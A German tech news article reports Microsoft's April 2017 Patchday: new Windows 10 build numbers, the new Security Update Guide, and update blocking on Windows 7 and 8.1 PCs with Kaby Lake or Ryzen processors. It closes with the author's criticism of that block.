Für jede Windows 10 Version veröffentlicht Microsoft ein eigenes kumulatives Update, welche die entsprechenden Windows 10 Versionen auf neue Build-Nummern hebt:

• Windows 10 Version 1703 Build 15063.138
• Windows 10 Version 1607 Build 14393.1066
• Windows 10 Version 1511 Build 10586.873
• Windows 10 Version 1507 (RTM) Build 10240.17354

Darüber hinaus ersetzt Microsoft nun offiziell die bisher verwendeten Sicherheitsbulletin-Webseiten durch den Leitfaden für Sicherheitsupdates. Dieses Vorhaben hat der Softwareriese bereits im November 2016 angekündigt. Das neue Portal soll Kunden einen besseren Überblick über neue Updates liefern, was vor allem durch die vielfältigen Such- und Filterfunktionen gewährleistet werden soll. So kann beispielsweise nach Datum, Produkt, Schweregrad, Auswirkung, KB- oder CVE-Nummer gesucht werden.

Nachfolgend ein kurzer Überblick über die neuen Updates für April 2017:

Was sich bereits letzten Monat angedeutet hat ist nun Tatsache: Beim Einsatz von neueren Prozessoren liefert Microsoft zukünftig unter Windows 7 und 8.1 keine Updates mehr aus. Auch die korrespondierenden Server-Betriebssysteme sind davon betroffen. Bei den Prozessoren handelt es sich konkret um Intels Kaby Lake und AMDs Ryzen.

Die entsprechende Funktionalität hatte Microsoft bereits im März in die optionale Vorschau auf den April-Patchday eingebaut (Windows 7: KB4012218; Windows 8.1: KB4012219). Mit dem aktuellen April-Patchday wurde die Funktionalität nun offiziell ausgerollt. Der Code zum Blockieren von Windows-Updates beim Einsatz von neueren Prozessoren versteckt sich in den Updates KB4015549 (Windows 7) und KB4015550 (Windows 8.1). Alle Updates für April werden also noch installiert, erst danach wird jeder weitere Update-Versuch mit einer Fehlermeldung quittiert:

Windows 7/8.1: Fehlermeldung „Hardware nicht unterstützt“ nach dem Patchday April 2017

Darüber hinaus kann es auch zum Fehlercode 0x80240037 kommen:

Microsoft selbst weist im KB-Artikel 4012982 auf dieses Verhalten hin: Fehlermeldung „Ihr PC verwendet einen unter dieser Windows-Version nicht unterstützten Prozessor“ beim Suchen oder Herunterladen von Windows-Updates. Auch im „Informationsblatt zum Lebenszyklus von Windows“ hat der Softwareriese eine neue Passage hinzugefügt:

In früheren Versionen von Windows, einschließlich Windows 7 und Windows 8.1, ist die Unterstützung für neue Prozessoren und Chipsätze von Herstellern wie Intel, AMD, NVidia und Qualcomm eingeschränkt.

Offensichtlich möchte Microsoft mit dieser Zwangsmaßnahme mehr Kunden zu Windows 10 bewegen. Zumindest von der technischen Seite lässt sich das Blocken von zukünftigen Windows-Updates auf neueren Prozessoren nicht begründen. Vielmehr könnte man sogar so weit gehen und Microsoft Vertragsbruch vorwerfen, denn bisher hat der Hersteller Sicherheits-Updates bis zum Auslaufen des Supports versprochen. Der Mainstream-Support für Windows 8.1 endet am 9. Januar 2018 und der Extended- Support sogar erst am 10. Januar 2023. Bei Windows 7 läuft der erweiterte Support bis 14. Januar 2020. Ganz so einfach dürfte die Sache aber nicht sein und vielleicht gibt es bald ein paar mutige Nutzer, die sich zu einer Sammelklage gegen Microsoft zusammenfinden.